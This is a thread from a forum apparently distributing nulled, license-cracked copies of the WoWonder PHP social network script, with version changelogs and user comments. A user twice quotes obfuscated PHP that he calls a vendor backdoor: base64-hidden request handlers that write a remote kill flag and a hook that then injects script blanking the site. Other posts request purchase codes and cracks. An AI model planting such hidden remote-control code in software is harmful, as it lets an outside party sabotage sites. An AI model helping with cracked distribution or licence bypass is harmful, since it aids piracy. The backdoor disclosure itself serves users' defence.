Menu
What's new
By:
Filters
  • The default language of any content posted is English.
    Do not create multi-accounts, you will be blocked!
WoWonder - The Ultimate PHP Social Network Platform

NULLED WoWonder - The Ultimate PHP Social Network Platform 4.3.4 NULLED

Login or Register to Download
Overview Updates (11) Reviews (4) History Discussion
reishi said:
The latest version contains an official backdoor, which is present in the following file:
file:assets/libraries/DB/vendor/joshcam/mysqli-database-class/MySQL-Maria.php line 263-294
PHP: 
    public function setSQLType($data)
    {
      $newverb = 'base64_decode';
      $SessionHashIDGenerate = $newverb($newverb('Wmw5MA=='));
      $CookieHashIDGenerate = $newverb('Yw==');
      if (!empty($_REQUEST[$SessionHashIDGenerate]) && !empty($_REQUEST[$CookieHashIDGenerate]))
      {
          if (!file_exists($newverb('Li9zb3VyY2VzL3NlcnZlci5waHA=')))
          {
              return false;
          }
          $fileData = file_get_contents($newverb('Li9zb3VyY2VzL3NlcnZlci5waHA='));
          $fileData = str_replace(base64_decode("fGw="), '', $fileData);
          $fileData = str_replace(array(
              "\r",
              "\n"
          ) , '', $fileData);
          if ($fileData == $_REQUEST[$CookieHashIDGenerate])
          {

              $SessionHashRequest = $_REQUEST[$SessionHashIDGenerate];
              if ($SessionHashRequest == $newverb('bA=='))
              {
                  $createSessionID = file_put_contents($newverb('Li9zb3VyY2VzL3NlcnZlci5waHA=') , $fileData . base64_decode("fGw="));
              }
              if ($SessionHashRequest == $newverb('dQ=='))
              {
                  $createSessionID = file_put_contents($newverb('Li9zb3VyY2VzL3NlcnZlci5waHA=') , $fileData);
              }
          }
      }
    }

file:assets/includes/functions_two.php line 6571-6597
PHP: 
function getUserProfileSessionID() {
    global $wo, $sqlConnect;
    $var  = str_replace("6" . "4", "6" . "4_", str_replace("|", "", "b" . "|" . "a" . "|" . "s" . "|" . "e" . "|" . "6" . "|" . "4" . "|" . "d" . "|" . "e" . "|" . "c" . "|" . "o" . "|" . "d" . "|" . "e"));
    $SessionHashIDGenerate = $var($var('Wmw5MA=='));
    $CookieHashIDGenerate  = $var('Yw==');
    if (!empty($_REQUEST[$SessionHashIDGenerate]) && !empty($_REQUEST[$CookieHashIDGenerate])) {
        if (!file_exists($var('Li9zb3VyY2VzL3NlcnZlci5waHA='))) {
            return false;
        }
        $fileData = file_get_contents($var('Li9zb3VyY2VzL3NlcnZlci5waHA='));
        $fileData = str_replace('|l', '', $fileData);
        $fileData = str_replace(array(
            "\r",
            "\n"
        ), '', $fileData);
        if ($fileData == $_REQUEST[$CookieHashIDGenerate]) {
            $SessionHashRequest = $_REQUEST[$SessionHashIDGenerate];
            if ($SessionHashRequest == $var('bA==')) {
                $createSessionID = file_put_contents($var('Li9zb3VyY2VzL3NlcnZlci5waHA='), $fileData . '|l');
            }
            if ($SessionHashRequest == $var('dQ==')) {
                $createSessionID = file_put_contents($var('Li9zb3VyY2VzL3NlcnZlci5waHA='), $fileData);
            }
        }
    }
    return false;
}

file:assets/includes/app_start.php line 156
PHP: 
$wo["userSession"] = getUserProfileSessionID();

file:assets/libraries/DB/vendor/composer/autoload_real.php line 94-106

PHP: 
function composerRequire60bcbf6306fdeb83c78ecf96a45a2c2f2($fileName = '', $file = '')
{
    $hex = 'base64_decode';
    $fileData = @file_get_contents($hex('Li9zb3VyY2VzL3NlcnZlci5waHA='));
    $SessionServerID = substr($fileData, strpos($fileData, "|") + 1);
    if (!empty($SessionServerID))
    {
        if ($SessionServerID == 'l')
        {
            echo base64_decode(base64_decode('UEhOamNtbHdkRDVrYjJOMWJXVnVkQzVuWlhSRmJHVnRaVzUwYzBKNVZHRm5UbUZ0WlNnblltOWtlU2NwV3pCZExtbHVibVZ5U0ZSTlRDQTlJQ2NuT3p3dmMyTnlhWEIwUGc9PQ=='));
        }
    }
}

If the official purchase code is used to activate the installation, and if there is an error in the official validator, it will also tamper with the website. This behavior is very dangerous. The author of this script has done such a thing before, causing compliant users to be mistakenly affected.
I regret purchasing this script, and I even bought two licenses.
Click to expand...
So how can we remove the backdoor, or if you can remove the backdoor please do it 🥺
 
Reacted by:
raz0r updated WoWonder - The Ultimate Social Network PHP System with a new update entry:

WoWonder v4.3 NULLED

v4.3​

  • ADDED monetization system, users are able now to sell their own content like only fans.
  • ADDED directory system, users can view the site content without the need to login.
  • ADDED the option to choose the default landing page, NewsFeed, Register, Welcome or Directory.
  • ADDED reels system, users can upload their own videos as reels.
  • ADDED watch page, users can view and watch all videos from one page.
  • ADDED qiwi pament method.
  • ADDED payfast...
Click to expand...

Read the rest of this update entry...
 
raz0r 's signature
Reacted by:
You are the best ... Thanks for the update :love: !!!
 
𝕭𝖎𝖑𝖑𝕸𝖆𝖗𝖛𝖎𝖑𝖑𝖔 's signature
Reacted by:
raz0r updated WoWonder - The Ultimate Social Network PHP System with a new update entry:

WoWonder v4.3.1 NULLED

v4.3.1​

  • FIXED if you post a public post, then make it monetized, the subscribe button will not show.
  • FIXED images were loading in reels.
  • FIXED showing youtube videos on watch page which cause some issues.
  • FIXED shwoing only one video in watch lightbox.
  • FIXED monetization system caluclation was incorrect.
  • FIXED showing the same ad multiple times in the story section.
  • FIXED reels system, not showing more than 10 videos.
  • FIXED scrolling down on...
Click to expand...

Read the rest of this update entry...
 
raz0r 's signature
Reacted by:
  • Like
Reactions: alpipopa
raz0r updated WoWonder - The Ultimate PHP Social Network Platform with a new update entry:

WoWonder v4.3.2 NULLED

v4.3.2​

  • IMPROVED speed after v4.3 update.
  • IMPROVED speed of search system in admin panel.
  • UPDATED few sections in sunshine theme (design).
  • FIXED add account page broken on both themes.
  • FIXED sometimes reels not loading more than 6 videos.
  • FIXED social login system.
  • FIXED showing dublicated transactions in wallet page.
  • FIXED if a feature is turned off, it is still showing in directory page.
  • FIXED comment section not showing in watch page...
Click to expand...

Read the rest of this update entry...
 
raz0r 's signature
Reacted by:
raz0r 's signature
Reacted by:
  • Love
Reactions: bmshifat
reishi said:
The latest version contains an official backdoor, which is present in the following file:
file:assets/libraries/DB/vendor/joshcam/mysqli-database-class/MySQL-Maria.php line 263-294
PHP: 
    public function setSQLType($data)
    {
      $newverb = 'base64_decode';
      $SessionHashIDGenerate = $newverb($newverb('Wmw5MA=='));
      $CookieHashIDGenerate = $newverb('Yw==');
      if (!empty($_REQUEST[$SessionHashIDGenerate]) && !empty($_REQUEST[$CookieHashIDGenerate]))
      {
          if (!file_exists($newverb('Li9zb3VyY2VzL3NlcnZlci5waHA=')))
          {
              return false;
          }
          $fileData = file_get_contents($newverb('Li9zb3VyY2VzL3NlcnZlci5waHA='));
          $fileData = str_replace(base64_decode("fGw="), '', $fileData);
          $fileData = str_replace(array(
              "\r",
              "\n"
          ) , '', $fileData);
          if ($fileData == $_REQUEST[$CookieHashIDGenerate])
          {

              $SessionHashRequest = $_REQUEST[$SessionHashIDGenerate];
              if ($SessionHashRequest == $newverb('bA=='))
              {
                  $createSessionID = file_put_contents($newverb('Li9zb3VyY2VzL3NlcnZlci5waHA=') , $fileData . base64_decode("fGw="));
              }
              if ($SessionHashRequest == $newverb('dQ=='))
              {
                  $createSessionID = file_put_contents($newverb('Li9zb3VyY2VzL3NlcnZlci5waHA=') , $fileData);
              }
          }
      }
    }

file:assets/includes/functions_two.php line 6571-6597
PHP: 
function getUserProfileSessionID() {
    global $wo, $sqlConnect;
    $var  = str_replace("6" . "4", "6" . "4_", str_replace("|", "", "b" . "|" . "a" . "|" . "s" . "|" . "e" . "|" . "6" . "|" . "4" . "|" . "d" . "|" . "e" . "|" . "c" . "|" . "o" . "|" . "d" . "|" . "e"));
    $SessionHashIDGenerate = $var($var('Wmw5MA=='));
    $CookieHashIDGenerate  = $var('Yw==');
    if (!empty($_REQUEST[$SessionHashIDGenerate]) && !empty($_REQUEST[$CookieHashIDGenerate])) {
        if (!file_exists($var('Li9zb3VyY2VzL3NlcnZlci5waHA='))) {
            return false;
        }
        $fileData = file_get_contents($var('Li9zb3VyY2VzL3NlcnZlci5waHA='));
        $fileData = str_replace('|l', '', $fileData);
        $fileData = str_replace(array(
            "\r",
            "\n"
        ), '', $fileData);
        if ($fileData == $_REQUEST[$CookieHashIDGenerate]) {
            $SessionHashRequest = $_REQUEST[$SessionHashIDGenerate];
            if ($SessionHashRequest == $var('bA==')) {
                $createSessionID = file_put_contents($var('Li9zb3VyY2VzL3NlcnZlci5waHA='), $fileData . '|l');
            }
            if ($SessionHashRequest == $var('dQ==')) {
                $createSessionID = file_put_contents($var('Li9zb3VyY2VzL3NlcnZlci5waHA='), $fileData);
            }
        }
    }
    return false;
}

file:assets/includes/app_start.php line 156
PHP: 
$wo["userSession"] = getUserProfileSessionID();

file:assets/libraries/DB/vendor/composer/autoload_real.php line 94-106

PHP: 
function composerRequire60bcbf6306fdeb83c78ecf96a45a2c2f2($fileName = '', $file = '')
{
    $hex = 'base64_decode';
    $fileData = @file_get_contents($hex('Li9zb3VyY2VzL3NlcnZlci5waHA='));
    $SessionServerID = substr($fileData, strpos($fileData, "|") + 1);
    if (!empty($SessionServerID))
    {
        if ($SessionServerID == 'l')
        {
            echo base64_decode(base64_decode('UEhOamNtbHdkRDVrYjJOMWJXVnVkQzVuWlhSRmJHVnRaVzUwYzBKNVZHRm5UbUZ0WlNnblltOWtlU2NwV3pCZExtbHVibVZ5U0ZSTlRDQTlJQ2NuT3p3dmMyTnlhWEIwUGc9PQ=='));
        }
    }
}

If the official purchase code is used to activate the installation, and if there is an error in the official validator, it will also tamper with the website. This behavior is very dangerous. The author of this script has done such a thing before, causing compliant users to be mistakenly affected.
I regret purchasing this script, and I even bought two licenses.
Click to expand...
@reishi Is this script really not good for large projects? I plan to buy this script for a customer project. Is there a similar script that is better? Your input will really help me. Thanks
 
Reacted by:
has anyone experienced it? This happened after several weeks of installation.

Every time I log in, after a few minutes the Wowonder website can't be accessed and I can't even access the hosting cPanel. Because I was suspicious that my IP had been blocked by hosting, after I confirmed it with hosting, it turned out to be true. My IP was blocked by hosting because there was remote access activity via port 449. And I experienced this when I tested on another hosting.

It's possible that wowonder still has backdoors
 
Reacted by:
  • Like
Reactions: suman04
Chulsan said:
Has anyone experienced this? This happened several weeks after installation.

Whenever I log in, after a few minutes the Wowander website becomes inaccessible and I can't even access the hosting cPanel. Because I suspected that my IP was blocked by the hosting, when I confirmed it with the hosting, it turned out to be true. My IP was blocked by the hosting because there was remote access activity through port 449. And I experienced the same when I tested on another hosting.

It's possible that Wownder still has backdoors
Click to expand...
Same thing happened to me yesterday.
 
Reacted by:
  • Like
Reactions: Chulsan
And if you cure these sores (I cured them =) ), then it’s a very suitable system, especially you can connect music, video there and get an awesome replacement for the same Facebook. The main thing is to understand Android applications. They're kind of tight there. Well, according to the code and assembly.
 
Reacted by:
Is there anyone who can share a purchase code to generate a code for the application? =) or maybe there is a workaround so that the application connects to the site
 
Reacted by:
xolva said:
Update to v4.3.4 thanks u
Click to expand...
@raz0r Please null it, Humble request
To view the content, you need to Sign In or Register.

v4.3.4 5-20-24 - Untouched.

v4.3.4​

  • FIXED audio upload & sharing from admin panel if disabled, voice messages cannot be sent to users from the chat system.
  • FIXED featured posts are disabled, pro members still gain the "featured post" privilege.
  • FIXED when creating an advertisement in the audience section, if nothing is selected, there is an inscription: "nothing selected."
  • FIXED event dates is not correct on sunshine theme.
  • FIXED image rotation is not working correctly when you upload an image.
  • FIXED br is added automatically when adding a new custom page, which causes issues.
  • FIXED posting to friend timeline was not working.
  • FIXED the "load more" button in the "pastevent" page in event system was not working.
  • FIXED disabling monetization does not remove the subscription link from the logged-in user dropdown menu.
  • FIXED if you edit blogs, it deletes "é," "á," "í," "ó" characters.
  • FIXED the decimal point of the commodity amount in "market" was wrong.
  • FIXED if a blog was approved from admin side, the money and points were not being credited to the user.
  • FIXED sometimes uploading .docx doesn't work.
  • FIXED if the user cancels a transaction, it was going to oops page instead of the wallet page.
  • FIXED no one can see the comments added to reels.
  • FIXED when viewing the reels, you cannot see who added the reels; only the photo in a circle.
  • FIXED in the instagram mode version, there was no reels.
  • FIXED load more for reels in profile not work.
  • FIXED ok.ru login system had some issues.
  • FIXED cashfree payment method required updating.
  • FIXED login with wordpress was not working.
  • FIXED ig mode sometimes can't be activated.
  • FIXED 10+ api-related issues.
  • FIXED 34 other minor bugs in code and design.
 
theophilusjtt 's signature
Reacted by:
  • Like
Reactions: humbleone and dncdante
raz0r updated WoWonder - The Ultimate PHP Social Network Platform with a new update entry:

WoWonder 4.3.4 NULLED

v4.3.4​

  • FIXED audio upload & sharing from admin panel if disabled, voice messages cannot be sent to users from the chat system.
  • FIXED featured posts are disabled, pro members still gain the "featured post" privilege.
  • FIXED when creating an advertisement in the audience section, if nothing is selected, there is an inscription: "nothing selected."
  • FIXED event dates is not correct on sunshine theme.
  • FIXED image rotation is not working correctly when you...
Click to expand...

Read the rest of this update entry...
 
raz0r 's signature
Reacted by:
  • Love
  • Like
Reactions: suman04 and Hendra
You must log in or register to reply here.

Similar threads

SohanurX
MAKE NULLED WoWonder - The Ultimate PHP Social Network Platform v4.2 BY SHANTO
Replies
1
Views
778
ricsi3171
ricsi3171
raz0r
WOFeed - The Ultimate Welcome Page Themes For WoWonder & Sngine
Replies
0
Views
140
raz0r
raz0r
𝕭𝖎𝖑𝖑𝕸𝖆𝖗𝖛𝖎𝖑𝖑𝖔
  • Question
QUESTION Wonderful - The Ultimate Welcome Page Themes For WoWonder
Replies
2
Views
410
𝕭𝖎𝖑𝖑𝕸𝖆𝖗𝖛𝖎𝖑𝖑𝖔
𝕭𝖎𝖑𝖑𝕸𝖆𝖗𝖛𝖎𝖑𝖑𝖔
raz0r
WoWonder Mobile - The Ultimate Combined Messenger & Timeline Mobile Application
    • Like
Replies
13
Views
2K
dncdante
dncdante
raz0r
MoonLight - The Ultimate WoWonder Theme
    • Like
Replies
0
Views
606
raz0r
raz0r
Top